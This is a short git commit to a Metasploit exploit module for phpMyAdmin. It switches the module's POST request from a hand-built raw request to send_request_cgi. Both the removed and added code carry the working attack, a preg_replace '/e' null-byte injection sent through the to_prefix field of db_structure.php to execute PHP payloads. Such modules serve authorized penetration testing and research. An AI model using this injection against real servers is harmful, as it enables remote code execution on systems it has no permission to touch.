Change to send_rq_cgi

Meatballs1 · Meatballs1 · commit a17d61897dfa · 2013-04-26T19:19:11.000+01:00
diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb
@@ -37,6 +37,7 @@ def initialize(info = {})
 			'Arch'		 => ARCH_PHP,
 			'Payload'	 =>
 				{
+					'BadChars' => "&\n=+%",
 					'DisableNops' => true,
 					'Compat' => { 'ConnectionType' => 'find' }
 				},
@@ -155,37 +156,21 @@ def exploit
 		end
 
 		db = rand_text_alpha(3+rand(3))
-		pay = Rex::Text.encode_base64(payload.encoded)
-		evil = []
-		evil << "query_type=replace_prefix_tbl"
-		evil << "db=#{db}"
-		evil << "selected%5B0%5D=#{db}"
-		evil << "token=#{token}"
-		evil << "from_prefix=%2Fe%00"
-		evil << "to_prefix=#{Rex::Text.uri_encode("eval(base64_decode('#{pay}'))", 'hex-random')}"
-		evil << "mult_btn=Yes"
-
-		data = ""
-		evil.shuffle!
-		0.upto(evil.count-1) do |i|
-			if i == 0
-				data << evil[i]
-			else
-				data << '&' << evil[i]
-			end
-		end
-
-		exploit_result = send_request_raw({
-			'uri'	  => uri('db_structure.php'),
-			'method'  => 'POST',
-			'data'	  => data,
-			'cookie'  => cookie,
-			'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
-		},2)
 
-		if exploit_result
-			print_error("Response retrieved from server, exploit failed.")
-		end
+		exploit_result = send_request_cgi({
+			'uri'	=> uri('db_structure.php'),
+			'method' => 'POST',
+			'cookie' => cookie,
+			'vars_post' => {
+				'query_type' => 'replace_prefix_tbl',
+				'db' => db,
+				'selected[0]' => db,
+				'token' => token,
+				'from_prefix' => "/e\0",
+				'to_prefix' => payload.encoded,
+				'mult_btn' => 'Yes'
+			}
+		},1)
 	end
 end
 
